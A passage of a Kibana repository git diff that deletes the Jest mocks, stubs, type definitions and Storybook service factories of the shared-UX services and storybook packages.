Promise.resolve(config?.hasUserDataView || false), -}); diff --git a/packages/kbn-shared-ux-services/src/services/mock/doc_links.mock.ts b/packages/kbn-shared-ux-services/src/services/mock/doc_links.mock.ts deleted file mode 100644 index 2ee0985d0a413..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/doc_links.mock.ts +++ /dev/null 
@@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { ServiceFactory } from '../../types'; -import type { SharedUxDocLinksService } from '../doc_links'; - -/** - * A factory function for creating a Jest implementation of `SharedUxDocLinksService`. - */ -export type MockDocLinksServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxDocLinksService`. - */ -export const docLinksServiceFactory: MockDocLinksServiceFactory = () => ({ - dataViewsDocLink: 'dummy link', -}); diff --git a/packages/kbn-shared-ux-services/src/services/mock/editors.mock.ts b/packages/kbn-shared-ux-services/src/services/mock/editors.mock.ts deleted file mode 100644 index 80742f15d93cd..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/editors.mock.ts +++ /dev/null 
@@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { ServiceFactory } from '../../types'; -import type { SharedUxEditorsService } from '../editors'; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxEditorsService`. - */ -export type MockEditorsServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxEditorsService`. - */ -export const editorsServiceFactory: MockEditorsServiceFactory = () => ({ - openDataViewEditor: jest.fn(), -}); diff --git a/packages/kbn-shared-ux-services/src/services/mock/http.mock.ts b/packages/kbn-shared-ux-services/src/services/mock/http.mock.ts deleted file mode 100644 index 0ef07526e5116..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/http.mock.ts +++ /dev/null @@ -1,19 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { ServiceFactory } from '../../types'; -import { SharedUxHttpService } from '../http'; - -export type MockHttpServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Jest-based implementation of `SharedUXHttpService`. - */ -export const httpServiceFactory: MockHttpServiceFactory = () => ({ - addBasePath: jest.fn((path: string) => (path ? path : 'path')), -}); 
diff --git a/packages/kbn-shared-ux-services/src/services/mock/index.ts b/packages/kbn-shared-ux-services/src/services/mock/index.ts deleted file mode 100644 index 604a8ae677b9d..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/index.ts +++ /dev/null 
@@ -1,64 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { SharedUxServices } from '../../types'; - -import { applicationServiceFactory } from './application.mock'; -import { docLinksServiceFactory } from './doc_links.mock'; -import { editorsServiceFactory } from './editors.mock'; -import { httpServiceFactory } from './http.mock'; -import { userPermissionsServiceFactory } from './permissions.mock'; -import { platformServiceFactory } from './platform.mock'; -import { dataServiceFactory, MockDataServiceFactoryConfig } from './data.mock'; - -export type { MockApplicationServiceFactory } from './application.mock'; -export type { MockDocLinksServiceFactory } from './doc_links.mock'; -export type { MockEditorsServiceFactory } from './editors.mock'; -export type { MockHttpServiceFactory } from './http.mock'; -export type { MockUserPermissionsServiceFactory } from './permissions.mock'; -export type { MockPlatformServiceFactory } from './platform.mock'; - -export { applicationServiceFactory } from './application.mock'; -export { docLinksServiceFactory } from './doc_links.mock'; -export { editorsServiceFactory } from './editors.mock'; -export { httpServiceFactory } from './http.mock'; -export { userPermissionsServiceFactory } from './permissions.mock'; -export { platformServiceFactory } from './platform.mock'; -export { dataServiceFactory } from './data.mock'; - -export interface MockServicesFactoryParams { - config: MockDataServiceFactoryConfig; -} - -/** - * A factory function for creating a Jest-based implementation of `SharedUxServices`. 
- */ -export const mockServicesFactory: (params?: MockServicesFactoryParams) => SharedUxServices = ( - params?: MockServicesFactoryParams -) => ({ - application: applicationServiceFactory(), - docLinks: docLinksServiceFactory(), - editors: editorsServiceFactory(), - http: httpServiceFactory(), - permissions: userPermissionsServiceFactory(), - platform: platformServiceFactory(), - data: dataServiceFactory(params?.config), -}); - -/** - * A collection of mock Service Factories. - */ -export const mockServiceFactories = { - applicationServiceFactory, - docLinksServiceFactory, - editorsServiceFactory, - httpServiceFactory, - platformServiceFactory, - userPermissionsServiceFactory, - dataServiceFactory, -}; diff --git a/packages/kbn-shared-ux-services/src/services/mock/permissions.mock.ts b/packages/kbn-shared-ux-services/src/services/mock/permissions.mock.ts deleted file mode 100644 index 3fb5e78a5b839..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/permissions.mock.ts +++ /dev/null @@ -1,23 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { ServiceFactory } from '../../types'; -import type { SharedUxUserPermissionsService } from '../permissions'; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxUserPermissionsService`. - */ -export type MockUserPermissionsServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxUserPermissionsService`. - */ -export const userPermissionsServiceFactory: MockUserPermissionsServiceFactory = () => ({ - canCreateNewDataView: true, - canAccessFleet: true, -}); 
diff --git a/packages/kbn-shared-ux-services/src/services/mock/platform.mock.ts b/packages/kbn-shared-ux-services/src/services/mock/platform.mock.ts deleted file mode 100644 index 8e6ec205d2856..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/platform.mock.ts +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { ServiceFactory } from '../../types'; -import type { SharedUxPlatformService } from '../platform'; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxPlatformService`. - */ -export type MockPlatformServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxPlatformService`. - */ -export const platformServiceFactory: MockPlatformServiceFactory = () => ({ - setIsFullscreen: jest.fn(), -}); diff --git a/packages/kbn-shared-ux-services/src/services/permissions.ts b/packages/kbn-shared-ux-services/src/services/permissions.ts deleted file mode 100644 index d6fcabd8ccedf..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/permissions.ts +++ /dev/null 
@@ -1,16 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/** - * A service providing permissions information, typically for the current user. - */ -export interface SharedUxUserPermissionsService { - /** True if the user has permission to create a new Data View, false otherwise. */ - canCreateNewDataView: boolean; - canAccessFleet: boolean; -} diff --git a/packages/kbn-shared-ux-services/src/services/platform.ts b/packages/kbn-shared-ux-services/src/services/platform.ts deleted file mode 100644 index 83148abac8643..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/platform.ts +++ /dev/null @@ -1,24 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/** - * A service providing methods to interact with the platform in which this code is - * running, (almost always Kibana). - * - * Rather than provide the entire `CoreStart` contract to components, we provide simplified - * abstractions around a use case specific to Shared UX. This way, we know exactly how the - * `CoreStart` and other plugins are used. This makes mocking and refactoring easier when - * upstream dependencies change. - */ -export interface SharedUxPlatformService { - /** - * Sets the fullscreen state of the chrome. - * @param isFullscreen True if the chrome should be fullscreen, false otherwise. - */ - setIsFullscreen: (isFullscreen: boolean) => void; -} 
diff --git a/packages/kbn-shared-ux-services/src/services/stub/application.ts b/packages/kbn-shared-ux-services/src/services/stub/application.ts deleted file mode 100644 index 72c1f3db30089..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/stub/application.ts +++ /dev/null @@ -1,27 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { Observable } from 'rxjs'; -import { ServiceFactory } from '../../types'; -import { SharedUxApplicationService } from '../application'; - -export type ApplicationServiceFactory = ServiceFactory; - -/** - * A factory function for creating for creating a simple stubbed implementation of `SharedUXApplicationService`. - */ -export const applicationServiceFactory: ApplicationServiceFactory = () => ({ - navigateToUrl: (url) => { - // eslint-disable-next-line no-console - console.log(url); - return Promise.resolve(); - }, - currentAppId$: new Observable((subscriber) => { - subscriber.next('123'); - }), -}); diff --git a/packages/kbn-shared-ux-services/src/services/stub/data.ts b/packages/kbn-shared-ux-services/src/services/stub/data.ts deleted file mode 100644 index 833c64e1f9d8d..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/stub/data.ts +++ /dev/null 
@@ -1,24 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { ServiceFactory } from '../../types';
-import { SharedUxDataService } from '../data';
-
-/**
- * A factory function for creating a simple stubbed implementation of `SharedUxDataSevice`.
- */
-export type DataServiceFactory = ServiceFactory;
-
-/**
- * A factory function for creating a simple stubbed implementation of `SharedUxDataSevice`.
- */
-export const dataServiceFactory: DataServiceFactory = () => ({
- hasESData: () => Promise.resolve(true),
- hasDataView: () => Promise.resolve(false),
- hasUserDataView: () => Promise.resolve(false),
-});
diff --git a/packages/kbn-shared-ux-services/src/services/stub/doc_links.ts b/packages/kbn-shared-ux-services/src/services/stub/doc_links.ts
deleted file mode 100644
index 9bcfd7db78cfa..0000000000000
--- a/packages/kbn-shared-ux-services/src/services/stub/doc_links.ts
+++ /dev/null
@@ -1,22 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import type { ServiceFactory } from '../../types';
-import type { SharedUxDocLinksService } from '../doc_links';
-
-/**
- * A factory function for creating a stubbed implementation of `SharedUxDocLinksService`.
- */
-export type DocLinksServiceFactory = ServiceFactory;
-
-/**
- * A factory function for creating a stubbed implementation of `SharedUxDocLinksService`.
- */
-export const docLinksServiceFactory: DocLinksServiceFactory = () => ({
- dataViewsDocLink: 'docs',
-});
diff --git a/packages/kbn-shared-ux-services/src/services/stub/editors.ts b/packages/kbn-shared-ux-services/src/services/stub/editors.ts
deleted file mode 100644
index 545539d873941..0000000000000
--- a/packages/kbn-shared-ux-services/src/services/stub/editors.ts
+++ /dev/null
@@ -1,22 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import type { ServiceFactory } from '../../types';
-import type { SharedUxEditorsService } from '../editors';
-
-/**
- * A factory function for creating a simple stubbed implementation of `SharedUxEditorsService`.
- */
-export type EditorsServiceFactory = ServiceFactory;
-
-/**
- * A factory function for creating a simple stubbed implementation of `SharedUxEditorsService`.
- */
-export const editorsServiceFactory: EditorsServiceFactory = () => ({
- openDataViewEditor: () => () => {},
-});
diff --git a/packages/kbn-shared-ux-services/src/services/stub/http.ts b/packages/kbn-shared-ux-services/src/services/stub/http.ts
deleted file mode 100644
index 08dae62ecdb7f..0000000000000
--- a/packages/kbn-shared-ux-services/src/services/stub/http.ts
+++ /dev/null
@@ -1,24 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { ServiceFactory } from '../../types';
-import { SharedUxHttpService } from '../http';
-
-/**
- * A factory function for creating a simple stubbed implementation of `SharedUXHttpService`.
- */
-export type HttpServiceFactory = ServiceFactory;
-
-/**
- * A factory function for creating a simple stubbed implementation of `SharedUXHttpService`.
- */
-export const httpServiceFactory: HttpServiceFactory = () => ({
- addBasePath: (url: string) => {
- return url;
- },
-});
diff --git a/packages/kbn-shared-ux-services/src/services/stub/index.ts b/packages/kbn-shared-ux-services/src/services/stub/index.ts
deleted file mode 100644
index ab8b0ca3f4d9c..0000000000000
--- a/packages/kbn-shared-ux-services/src/services/stub/index.ts
+++ /dev/null
@@ -1,43 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import type { SharedUxServices, ServiceFactory } from '../../types';
-
-import { applicationServiceFactory } from './application';
-import { docLinksServiceFactory } from './doc_links';
-import { editorsServiceFactory } from './editors';
-import { httpServiceFactory } from './http';
-import { platformServiceFactory } from './platform';
-import { userPermissionsServiceFactory } from './permissions';
-import { dataServiceFactory } from './data';
-
-/**
- * A factory function for creating simple stubbed implementations of all `SharedUxServices`.
- */
-export const stubServicesFactory: ServiceFactory = () => ({
- application: applicationServiceFactory(),
- docLinks: docLinksServiceFactory(),
- editors: editorsServiceFactory(),
- http: httpServiceFactory(),
- permissions: userPermissionsServiceFactory(),
- platform: platformServiceFactory(),
- data: dataServiceFactory(),
-});
-
-/**
- * A collection of stubbed service factories.
- */
-export const stubServiceFactories = {
- applicationServiceFactory,
- docLinksServiceFactory,
- editorsServiceFactory,
- httpServiceFactory,
- platformServiceFactory,
- userPermissionsServiceFactory,
- dataServiceFactory,
-};
diff --git a/packages/kbn-shared-ux-services/src/services/stub/permissions.ts b/packages/kbn-shared-ux-services/src/services/stub/permissions.ts
deleted file mode 100644
index e5588f818f82a..0000000000000
--- a/packages/kbn-shared-ux-services/src/services/stub/permissions.ts
+++ /dev/null
@@ -1,23 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import type { ServiceFactory } from '../../types';
-import type { SharedUxUserPermissionsService } from '../permissions';
-
-/**
- * A factory function for creating a simple stubbed implementation of `SharedUxUserPermissionsService`.
- */
-export type UserPermissionsServiceFactory = ServiceFactory;
-
-/**
- * A factory function for creating a simple stubbed implementation of `SharedUxUserPermissionsService`.
- */
-export const userPermissionsServiceFactory: UserPermissionsServiceFactory = () => ({
- canCreateNewDataView: true,
- canAccessFleet: true,
-});
diff --git a/packages/kbn-shared-ux-services/src/services/stub/platform.ts b/packages/kbn-shared-ux-services/src/services/stub/platform.ts
deleted file mode 100644
index 2e31238347307..0000000000000
--- a/packages/kbn-shared-ux-services/src/services/stub/platform.ts
+++ /dev/null
@@ -1,22 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import type { ServiceFactory } from '../../types';
-import type { SharedUxPlatformService } from '../platform';
-
-/**
- * A factory function for creating a simple stubbed implementation of `SharedUxPlatformService`.
- */
-export type PlatformServiceFactory = ServiceFactory;
-
-/**
- * A factory function for creating a simple stubbed implementation of `SharedUxPlatformService`.
- */
-export const platformServiceFactory: PlatformServiceFactory = () => ({
- setIsFullscreen: (_isFullscreen) => {},
-});
diff --git a/packages/kbn-shared-ux-services/src/types.ts b/packages/kbn-shared-ux-services/src/types.ts
deleted file mode 100755
index a0a4ec32c0e75..0000000000000
--- a/packages/kbn-shared-ux-services/src/types.ts
+++ /dev/null
@@ -1,52 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { FC } from 'react';
-
-import {
- SharedUxApplicationService,
- SharedUxDataService,
- SharedUxDocLinksService,
- SharedUxEditorsService,
- SharedUxHttpService,
- SharedUxPlatformService,
- SharedUxUserPermissionsService,
-} from './services';
-
-/**
- * A collection of services utilized by SharedUX. This serves as a thin
- * abstraction layer between services provided by Kibana and other plugins
- * while allowing this plugin to be developed independently of those contracts.
- *
- * It also allows us to "swap out" differenct implementations of these services
- * for different environments, (e.g. Jest, Storybook, etc.)
- */
-export interface SharedUxServices {
- application: SharedUxApplicationService;
- docLinks: SharedUxDocLinksService;
- editors: SharedUxEditorsService;
- http: SharedUxHttpService;
- permissions: SharedUxUserPermissionsService;
- platform: SharedUxPlatformService;
- data: SharedUxDataService;
-}
-
-/**
- * A type representing a component that provides the `SharedUxServices` through a
- * React Context.
- */
-export type SharedUxServicesContext = FC<{}>;
-
-/**
- * A factory function for creating one or more services.
- *
- * The `S` generic determines the shape of the API being produced.
- * The `Parameters` generic determines what parameters are expected to
- * create the service.
- */
-export type ServiceFactory = (params: Parameters) => S;
diff --git a/packages/kbn-shared-ux-storybook/README.mdx b/packages/kbn-shared-ux-storybook/README.mdx
deleted file mode 100644
index 11992e336e627..0000000000000
--- a/packages/kbn-shared-ux-storybook/README.mdx
+++ /dev/null
@@ -1,34 +0,0 @@
----
-id: kibSharedUXStorybook
-slug: /kibana-dev-docs/shared-ux/packages/kbn-shared-ux-storybook
-title: Shared UX Storybook
-description: The `@kbn/shared-ux-storybook` package provides Storybook assets for Shared UX and other teams.
-date: 2022-03-11
-tags: ['kibana', 'dev', 'sharedUX']
----
-
-## About Shared UX Storybook
-
-This package provides the Storybook implementation of `@kbn/shared-ux-services` as well as the configuration for the Shared UX Storybook site.
-
-- `/src/services` The `@kbn/shared-ux-services` implementation.
-- `src/config` The Storybook site configuration.
-
-## Storybook site
-
-Run `yarn storybook shared_ux` from `/kibana` to view the site. It pulls in `*.stories.tsx` from all Shared UX packages and plugins and combines them into a single configuration.
-
-## Decorator
-
-If you're writing stories for your own components that compose Shared UX components, you can use a pre-configured [Storybook Decorator](https://storybook.js.org/docs/react/writing-stories/decorators) in your Storybook configuration:
-
-```ts
-// preview.ts
-
-import { addDecorator } from '@storybook/react';
-import { servicesDecorator } from '@kbn/shared-ux-storybook';
-
-addDecorator(servicesDecorator);
-```
-
-This will not only expose parameters, but also wrap your story in a pre-wired `SharedUxServicesProvider`.
\ No newline at end of file
diff --git a/packages/kbn-shared-ux-storybook/src/config/preview.ts b/packages/kbn-shared-ux-storybook/src/config/preview.ts
deleted file mode 100644
index 194a16474af2c..0000000000000
--- a/packages/kbn-shared-ux-storybook/src/config/preview.ts
+++ /dev/null
@@ -1,12 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { addDecorator } from '@storybook/react';
-import { servicesDecorator } from '../decorators';
-
-addDecorator(servicesDecorator);
diff --git a/packages/kbn-shared-ux-storybook/src/decorators.tsx b/packages/kbn-shared-ux-storybook/src/decorators.tsx
deleted file mode 100644
index cae87a15b54dd..0000000000000
--- a/packages/kbn-shared-ux-storybook/src/decorators.tsx
+++ /dev/null
@@ -1,22 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import React from 'react';
-import { DecoratorFn } from '@storybook/react';
-
-import { SharedUxServicesProvider } from '@kbn/shared-ux-services';
-
-import { servicesFactory } from './services';
-
-/**
- * A Storybook decorator that provides the Shared UX `ServicesProvider` with Storybook-specific
- * implementations to stories.
- */
-export const servicesDecorator: DecoratorFn = (storyFn) => (
- {storyFn()}
-);
diff --git a/packages/kbn-shared-ux-storybook/src/index.ts b/packages/kbn-shared-ux-storybook/src/index.ts
deleted file mode 100755
index 6b310673eb00d..0000000000000
--- a/packages/kbn-shared-ux-storybook/src/index.ts
+++ /dev/null
@@ -1,22 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-export { servicesDecorator } from './decorators';
-
-export {
- applicationServiceFactory,
- docLinksServiceFactory,
- editorsServiceFactory,
- httpServiceFactory,
- platformServiceFactory,
- servicesFactory,
- userPermissionsServiceFactory,
- dataServiceFactory,
-} from './services';
-
-export type { DataServiceFactoryConfig } from './services';
diff --git a/packages/kbn-shared-ux-storybook/src/services/application.ts b/packages/kbn-shared-ux-storybook/src/services/application.ts
deleted file mode 100644
index 1b16526bc8be8..0000000000000
--- a/packages/kbn-shared-ux-storybook/src/services/application.ts
+++ /dev/null
@@ -1,24 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { BehaviorSubject } from 'rxjs';
-import { action } from '@storybook/addon-actions';
-import { ServiceFactory, SharedUxApplicationService } from '@kbn/shared-ux-services';
-
-export type ApplicationServiceFactory = ServiceFactory;
-
-/**
- * A factory function for creating for creating a storybook implementation of `SharedUXApplicationService`.
- */
-export const applicationServiceFactory: ApplicationServiceFactory = () => ({
- navigateToUrl: (url) => {
- action('navigateToUrl')(url);
- return Promise.resolve();
- },
- currentAppId$: new BehaviorSubject('123'),
-});
diff --git a/packages/kbn-shared-ux-storybook/src/services/data.ts b/packages/kbn-shared-ux-storybook/src/services/data.ts
deleted file mode 100644
index dbfd2fceb4210..0000000000000
--- a/packages/kbn-shared-ux-storybook/src/services/data.ts
+++ /dev/null
@@ -1,34 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { ServiceFactory, SharedUxDataService } from '@kbn/shared-ux-services';
-
-export interface DataServiceFactoryConfig {
- hasESData: boolean;
- hasDataView: boolean;
- hasUserDataView: boolean;
-}
-
-/**
- * A factory function for creating a Storybook implementation of `SharedUxDataService`.
- */
-export type SharedUxDataServiceFactory = ServiceFactory<
- SharedUxDataService,
- DataServiceFactoryConfig
->;
-
-/**
- * A factory function for creating a Storybook implementation of `SharedUxDataService`.
- */
-export const dataServiceFactory: SharedUxDataServiceFactory = (params) => {
- return {
- hasESData: () => Promise.resolve(params.hasESData || false),
- hasDataView: () => Promise.resolve(params.hasDataView || false),
- hasUserDataView: () => Promise.resolve(params.hasUserDataView || false),
- };
-};
diff --git a/packages/kbn-shared-ux-storybook/src/services/doc_links.ts b/packages/kbn-shared-ux-storybook/src/services/doc_links.ts
deleted file mode 100644
index eff942989956f..0000000000000
--- a/packages/kbn-shared-ux-storybook/src/services/doc_links.ts
+++ /dev/null
@@ -1,22 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { ServiceFactory, SharedUxDocLinksService } from '@kbn/shared-ux-services';
-
-/**
- * A factory function for creating a Storybook implementation of `SharedUxDocLinksService`.
- */
-export type SharedUxDocLinksServiceFactory = ServiceFactory;
-
-/**
- * A factory function for creating a Storybook implementation of `SharedUxDocLinksService`.
- */
-export const docLinksServiceFactory: SharedUxDocLinksServiceFactory = () => ({
- dataViewsDocLink: 'https://www.elastic.co/guide/en/kibana/master/data-views.html',
- kibanaGuideDocLink: 'https://www.elastic.co/guide/en/kibana/master/index.html',
-});
diff --git a/packages/kbn-shared-ux-storybook/src/services/editors.ts b/packages/kbn-shared-ux-storybook/src/services/editors.ts
deleted file mode 100644
index 69b9d7062da94..0000000000000
--- a/packages/kbn-shared-ux-storybook/src/services/editors.ts
+++ /dev/null
@@ -1,22 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { action } from '@storybook/addon-actions';
-import { ServiceFactory, SharedUxEditorsService } from '@kbn/shared-ux-services';
-
-/**
- * A factory function for creating a Storybook implementation of `SharedUxEditorsService`.
- */
-export type SharedUxEditorsServiceFactory = ServiceFactory;
-
-/**
- * A factory function for creating a Storybook implementation of `SharedUxEditorsService`.
- */
-export const editorsServiceFactory: SharedUxEditorsServiceFactory = () => ({
- openDataViewEditor: action('openEditor') as SharedUxEditorsService['openDataViewEditor'],
-});
diff --git a/packages/kbn-shared-ux-storybook/src/services/http.ts b/packages/kbn-shared-ux-storybook/src/services/http.ts
deleted file mode 100644
index f44fb10566dc3..0000000000000
--- a/packages/kbn-shared-ux-storybook/src/services/http.ts
+++ /dev/null
@@ -1,23 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { action } from '@storybook/addon-actions';
-
-import { ServiceFactory, SharedUxHttpService } from '@kbn/shared-ux-services';
-
-/**
- * A factory function for creating a Storybook-based implementation of `SharedUXHttpService`.
- */
-export type HttpServiceFactory = ServiceFactory;
-
-/**
- * A factory function for creating a Storybook-based implementation of `SharedUXHttpService`.
- */
-export const httpServiceFactory: HttpServiceFactory = () => ({
- addBasePath: action('addBasePath') as SharedUxHttpService['addBasePath'],
-});
diff --git a/packages/kbn-shared-ux-storybook/src/services/index.ts b/packages/kbn-shared-ux-storybook/src/services/index.ts
deleted file mode 100644
index ff6ad1f1f2913..0000000000000
--- a/packages/kbn-shared-ux-storybook/src/services/index.ts
+++ /dev/null
@@ -1,40 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import type { ServiceFactory, SharedUxServices } from '@kbn/shared-ux-services';
-
-import { applicationServiceFactory } from './application';
-import { docLinksServiceFactory } from './doc_links';
-import { editorsServiceFactory } from './editors';
-import { httpServiceFactory } from './http';
-import { platformServiceFactory } from './platform';
-import { userPermissionsServiceFactory } from './permissions';
-import { dataServiceFactory, DataServiceFactoryConfig } from './data';
-
-export { applicationServiceFactory } from './application';
-export { docLinksServiceFactory } from './doc_links';
-export { editorsServiceFactory } from './editors';
-export { httpServiceFactory } from './http';
-export { platformServiceFactory } from './platform';
-export { userPermissionsServiceFactory } from './permissions';
-export { dataServiceFactory } from './data';
-
-/**
- * A factory function for creating a Storybook implementation of `SharedUxServices`.
- */
-export const servicesFactory: ServiceFactory = (params) => ({
- application: applicationServiceFactory(),
- docLinks: docLinksServiceFactory(),
- editors: editorsServiceFactory(),
- http: httpServiceFactory(params),
- permissions: userPermissionsServiceFactory(),
